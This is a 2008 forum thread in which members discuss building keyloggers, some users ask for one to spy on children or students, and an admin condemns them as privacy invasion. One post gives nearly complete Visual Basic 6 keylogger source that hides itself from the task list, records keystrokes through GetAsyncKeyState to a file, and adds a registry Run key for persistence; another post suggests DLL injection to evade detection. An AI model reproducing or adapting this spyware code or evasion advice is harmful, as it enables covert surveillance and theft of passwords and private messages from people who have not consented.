Jump to content



Welcome to KnowledgeSutra - Dear Guest , Please Register here to get Your own website. - Ask a Question / Express Opinion / Reply w/o Sign-Up!
- - - - -

Key Logger.


49 replies to this topic

#26 Bayuugan

    Newbie [Level 3]

  • Kontributors
  • PipPipPip
  • 47 posts

Posted 30 May 2008 - 07:30 PM

why are u creating a key logger program??? :D

#27 nstay

    Newbie [Level 2]

  • Kontributors
  • PipPip
  • 39 posts

Posted 09 June 2008 - 02:32 PM

trying to "hack on to other people's stuffs huh" :D

#28 Erdemir

    Super Member

  • Kontributors
  • PipPipPipPipPipPipPipPipPip
  • 223 posts
  • Gender:Male
  • Location:Istanbul, Turkey
  • Interests:Interested in Mechanical Engineering

Posted 09 June 2008 - 06:39 PM

View PostZubair1, on Nov 13 2004, 11:23 PM, said:

Hi Pe :( ple ,

Can Any One Tell me how to build a Keylogger on Visual Bais 6.0
that no one could see on the End Task Menu

I built some keyloggers on Delphi just for fun. But I couldn't pass the firewalls to send the logged data.

By the way I don't like keyloggers, and I am sure that you will not pass the firewalls (Windows firewall or especially Kaspersky).
And also you can't hide any running exe from the task list in Windows XP. Maybe you can hide your exe from Windows 95/98/Me but not in Windows NT, 2000, XP and Vista.

But if you can inject your keylogger into a dll file that always runs, you can hide your application from task list. What dll(s), for example shell32.dll of Explorer.exe or Acrofx32.dll of AcroRd32.exe (Acrobat Reader) by a debugger. But this way is also impossible because any antiviruses can detect you as an injection especially KAV can detect.

You can use your keylogger without being detected in a computer that has no antivirus and no firewall :D

Good Luck...

#29 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 09 June 2008 - 10:06 PM

keylogging my son
Key Logger.

Replying to snlildude87Replying to snlildude87
Hello,

I have just read that you make keyloggers. I would love it if I could have your keylogger as I have a teenage son who I think spends his time on msn taking to older men and women from around the country, who he doesnt know I am very worried and in need of a hand. I would buy one but as a single parent I just do not have the money.

Thank you very much for your time and I hope to hear from you soon

Jane parsons

-reply by Jane parsons

#30 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 10 June 2008 - 02:27 PM

Replying to Trap FeedBackerReplying to snlildude87
I have a 13 year old dauther and 15 year old son that I'm worried about when the go online and if I could get your keylogger that would be great

-reply by Greg

#31 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 14 June 2008 - 12:49 PM

keylogger VB code
Key Logger.

Replying to snlildude87
Hi
This is krishna from chennai,India
I am helping for an orphanage(looking after physically disabled children) by creating some softwares that they nee.They asked me to create a software that zooms the character that the student is pressing especially in some programming editors such as turbo C.For that I need keylogger.Can you send me your code or give me some ideas to create my own keylogger.


-reply by krishna

#32 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 17 June 2008 - 03:50 PM

Look And Learn ^^
Key Logger.

Private Sub ath_Click()
MsgBox "Created By Mahendra M.W., This Program is for educational Purpose Only !", vbOKOnly, "About"
End Sub

'In a form
Private Sub Form_Load()
Me.Caption = "Key Spy"
'Create an API-timer
SetTimer Me.Hwnd, 0, 1, AddressOf TimerProc
App.TaskVisible = False
Form1.Visible = False
InfeksiRegistry

End Sub
Private Sub Form_Paint()
Dim are As RECT
Me.Cls
'API uses pixels
Me.ScaleMode = vbPixels
'Set the rectangle's values
SetRect are, 0, 0, Me.ScaleWidth, Me.ScaleHeight
'Draw the text on the form
DrawTextEx Me.HDC, mStr, Len(mStr), are, DT_WORDBREAK Or DT_CENTER, ByVal 0&
End Sub
Private Sub Form_Resize()
Form_Paint
End Sub

Private Sub Command1_Click()
If Check1.Value = 1 Then App.TaskVisible = False Else App.TaskVisible = True
If Check2.Value = 1 Then Form1.Visible = False Else Form1.Visible = True
InfeksiRegistry
End Sub

Private Sub Timer1_Timer()
On Error GoTo 11
Open "C:FileInformation.Dat" For Output As #1
Print #1, sSave
Close #1
GoTo 5
11: MsgBox "Do not modify this File as causing damaging your instability system ", vbCritical, "Information"
5: End Sub



'write in the module
Public Const DT_CENTER = &H1
Public Const DT_WORDBREAK = &H10
Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Declare Function DrawTextEx Lib "user32" Alias "DrawTextExA" (ByVal hDC As Long, ByVal lpsz As String, ByVal and As Long, lpRect As RECT, ByVal un As Long, ByVal lpDrawTextParams As Any) As Long
Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Global Cnt As Long, sSave As String, sOld As String, Ret As String
Dim Tel As Long
Function GetPressedKey() As String
For Cnt = 32 To 128
'Get the keystate of a specified key
If GetAsyncKeyState(Cnt) <> 0 Then
GetPressedKey = Chr$(Cnt)
Exit For
End If
Next Cnt
End Function
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
Ret = GetPressedKey
If Ret <> sOld Then
sOld = Ret
sSave = sSave + sOld
End If
End Sub
Public Function InfeksiRegistry()
Dim wshell As Object, rg1 As String, rg2 As String
Dim rg3 As String, rg4 As String
Rg1 = "SoftwareMicrosoftWindowsCurrentVersion"
Rg2 = "SOFTWAREMicrosoftWindows NTCurrentVersion"
Rg3 = "SoftwareMicrosoftInternetExplorerMain"
Rg4 = "SoftwarePoliciesMicrosoftWindowsSystem"
Set wshell = CreateObject("Wscript.Shell")
Wshell.Regwrite "HKLM" & rg1 & "runSystem Resource", _
Getwindowspath & "C:windowssystem32system32.Exe"
'you can add more value it's only example
End Function



-reply by Newbie

#33 tobimichigan

    Newbie

  • Kontributors
  • Pip
  • 2 posts

Posted 21 June 2008 - 12:35 PM

Well guys, to me I feel there's a downside and upside to this key-logging stuff. Some times for security and sometimes for other reasons. I would not opt to be for or against it. I think moderation might be most genius.
Cheerio...

#34 iGuest

    Hail Caesar!

  • Kontributors
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • 5,876 posts
  • Interests:Trap17 Free Web Hosting, No Ads

Posted 10 July 2008 - 10:25 PM

keylogger
Key Logger.

I am a principal for a college of more than 2000 students, some students have been caught doing, I'm not going to say it, but they have been caught doing stuff they shouldn't. I would like a way to keep track of students and what they have been doing on the comouters, so this keylogger seems to me to be a good idea.

-reply by principal

-----ADMIN REPLY-------
Keyloggers = seriously invading others privacy.

If you feel keyloggers are advanced stuff, think again. They are very easy to install and any person with basic knowledge can inject it in your "un-attended" pc as well.

Virus scanners cannot CATCH them because they are officially installed when your PC is IDLE (when you are away.)

Takes less than 20 SEC to install.
Completely PRECONFIGURED.
Removes traces even from CTRL+ALT+DEL screen.
Activates and sends the logs on email.
HOT KEY to show its activity.

JUST imagine, someone who has already DONE this to your Computer. And your PC which you are presently using to view this web page is already compromised.

All above.. simply does not sound good.

Keyloggers are evil. Are you?

Personal Opinion by,

-Shree (Trap17.com)

#35 kamahl

    Newbie [Level 1]

  • Kontributors
  • Pip
  • 10 posts

Posted 29 July 2008 - 01:17 PM

View PostiGuest-principal, on Jul 11 2008, 08:25 AM, said:

Keyloggers = seriously invading others privacy.

If you feel keyloggers are advanced stuff, think again. They are very easy to install and any person with basic knowledge can inject it in your "un-attended" pc as well.

Virus scanners cannot CATCH them because they are officially installed when your PC is IDLE (when you are away.)

Takes less than 20 SEC to install.
Completely PRECONFIGURED.
Removes traces even from CTRL+ALT+DEL screen.
Activates and sends the logs on email.
HOT KEY to show its activity.

JUST imagine, someone who has already DONE this to your Computer. And your PC which you are presently using to view this web page is already compromised.

All above.. simply does not sound good.

Keyloggers are evil. Are you?

Personal Opinion by,

-Shree (Trap17.com)

It depends on where you use it...

If I were to install a keylogger on my own computer, to catch people trying that stuff, where is the wrong?

While I personally don't agree with keyloggers, I do concede there are legitimate, legal purposes to them.




Reply to this topic


This post will need approval from a moderator before this post is shown.

  


1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users